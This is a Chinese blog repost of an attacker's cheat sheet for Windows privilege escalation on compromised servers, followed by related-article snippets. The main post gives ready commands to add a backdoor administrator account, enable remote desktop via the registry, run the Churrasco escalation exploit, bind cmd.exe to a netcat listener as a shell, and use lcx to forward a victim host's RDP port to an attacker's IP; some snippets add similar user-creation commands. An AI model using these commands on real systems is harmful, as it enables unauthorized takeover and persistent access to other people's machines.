cmd提权的一些常用命令

最新推荐文章于 2023-11-22 19:58:26 发布
最新推荐文章于 2023-11-22 19:58:26 发布
阅读量1.2k 收藏 3
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/hack0ne/p/4592536.html
版权

0x00    小菜今天学习了一些windows下的提权,分享一下,以后也方便查看,也请大牛指教

0x01  cmd基本命令(这乃安全工程师必备,如果你不知道,百度google你值得拥有)

net start telnet           开telnet服务(开启服务 service  start XX)

net user            查看所有用户列表

net user hack123 hack123 /add           添加用户hack123密码为hack123

net localgroup administrators hack123 /add   将帐号hack123升级为管理员

开3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

 

0x02  巴西烤肉  简单介绍一下,主要是服务器支持wscript组建,如果不支持就考虑别的方法吧,毕竟那啥,姿势还是要对,不对换一种呗,说一下利用,先上传一个cmd,然后上传巴西烤肉

执行 XXX\XXX\ Churrasco.exe "net user hack123 hack123 /add && net localgroup administrators hack123 /add"  (XXX是路径)

XXX\XXX\ Churrasco.exe "net user admin$ /del"  删除帐号

query user  查看会话

logoff ID号  踢掉

XXX\XXX\ Churrasco.exe "logoff 1" 

0x03  NC反弹

路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe

XXX\XXX\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe

NC上传

DOS界面下运行:

NC -vv url 80<1.txt

-vv: 回显


80: web端口

1.txt: 就是你要发送的数据包

0x04  LCX端口转发

先本地监听X端口 lcx.exe -listen X 3389

c:\recycler\lcx.exe -slave 自己的ip X 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389

 

转载于:https://www.cnblogs.com/hack0ne/p/4592536.html

dichunting8344
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows提权的几种常用姿势
01-11 4万+
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、B...
提权的命令
04-23
用户密码修改提权命令net user net localgroup administrators
cmd提权
Goldstine的博客
03-18 4074
cmd提权: 打开服务:net start 创建一个用户:net user goldstine 888888 /add 提升权限:net localgroup administrators gloldstine /add 激活:net user goldstine /active:yes 切换用户,登录 打开: runas /noprofile /user:goldstine c...
cmd部分提权常用命令
weixin_30443813的博客
11-07 681
ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$     映射对方的C盘 net user            查看所有用户列表 net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz net localgroup administrators hucx...
cmd提权专用
07-30
cmd.exe
windows cmd 窗口 显示信息慢_windows提权
weixin_39938724的博客
11-24 352
1.XP,2003提权1. 利用at命令,下面是at命令的百度解释AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。因为at命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。at 时间 /intera...
CMD】带参数请求提权方法
NXY666
02-21 2083
通过调用VBS启动带有管理员权限的CMD,并传入自身包含的参数。
SQL 提权 常用命令
12-15
database=数据库名 2、添加新用户 declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’ 3...
cmd的一些常用的命令
qq_42092076的博客
03-04 313
1.查看计算机打开了哪些端口: C:\Users\Administrator&gt;netstat -a 2.打开注册表 C:\Users\Administrator&gt;regedit.exe 3.查看ip C:\Users\Administrator&gt;ipconfig 4.改变cmd的颜色 C:\Users\Administrator&gt;color ? ...
windows cmd.zip
12-10
- **命令别名**:通过`doskey`命令创建命令别名,简化常用命令的输入。 - **管道和重定向**:`|`用于将一个命令的输出作为另一个命令的输入,`>`和`分别用于重定向输出和输入。 - **命令行参数**:许多命令支持使用`...
cmd命令使用.txt
05-12
cmd提权命令 CMD部分提权常用命令 NC反弹 NC上传 添加用户xiaoma密码为xiaoma
提权常用DOS命令运用
怪咖先森的博客
01-14 8414
1.运行环境cmd 窗口中运行这些命令2. DOS 命令2.1查看版本:ver2.2查看权限:whoami tangyuan-pc 只是用户,这的 lizi 是管理员权限(一般电脑上的叫:Administrator) 在服务器中进行提权(以后会讲怎么提权),一般权限都是 user 的普通权限,或者是 guest (来宾)的权限 2.3查看配置:systeminfo 我的出点问题,网上找
windows 提权
最新发布
qq_63527808的博客
11-22 1214
一、提权的常用方法。
Linux、Windows提权命令速记
Fly_鹏程万里
05-13 1621
Linux查看系统版本信息cat /etc/issue lsb_release -a查看系统内核版本信息uname -a cat /proc/version查看系统环境变量env set cat /etc/profile查看是否有打印机lpstat -a查看主机架构arch --version查看系统开启的服务以及权限ps -ef ps aux查看计划任务cat /etc/contab c...
Windows 7中怎么在CMD提权(以管理员权限运行)?
ygyangguang的专栏
04-02 9301
runas /user:administrator cmd
Linux安全之提权命令
mengmeng_921的博客
09-29 2573
是 linux 系统管理指令,是允许系统管理员让普通用户执行一些或者全部的 root 命令的一个工具,如 halt,reboot,su 等等。这样不仅减少了 root 用户的登录 和管理时间,同样也提高了安全性。sudo 不是对 shell 的一个代替,它是面向每个命令的。Linux安全之提权命令。
提权
joosonmao的专栏
04-15 1669
用http://www.microsoft.com/china/technet/sysinternals/utilities/pstools.mspx的PsExec提升explorer权限,或提升cmd权限在命令提示符下删 1.PsExec命令提升进程特权 我们可以借助PsExec命令工具以SYSTEM身份运行进程。我们已经知道只有SYSTEM帐户才能访问C:\System Volume
在Windows cmd 窗中提升权限,非重开管理员窗口
Fllowone的博客
03-15 5526
1、打开CMD 2、输入: runas /noprofile /user:Administrator cmd 3、输入Administrator账户的密码,必须设置密码 PS:可以不是Administrator账户,只要是具有管理员权限的账号都可,例如ASUS等。 runas /noprofile /user:ASUS cmd 然后输入ASUS账号的密码 run...
windows系统,计算机cmd管理员,命令行中普通用户获取管理员权限的命令
热门推荐
质量不太好的博客
01-09 1万+
windows系统,计算机cmd管理员,命令行中普通用户获取管理员权限的命令
全面解析:CMD命令手册及常用命令详解
以下是一些常见CMD命令的简要说明: 1. **ASSOC**: 显示或更改文件扩展名与特定程序的关联。例如,可以设置`.txt`文件默认用记事本打开。 2. **AT**: 定时运行计划任务,可以在特定时间执行命令或程序。 3. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值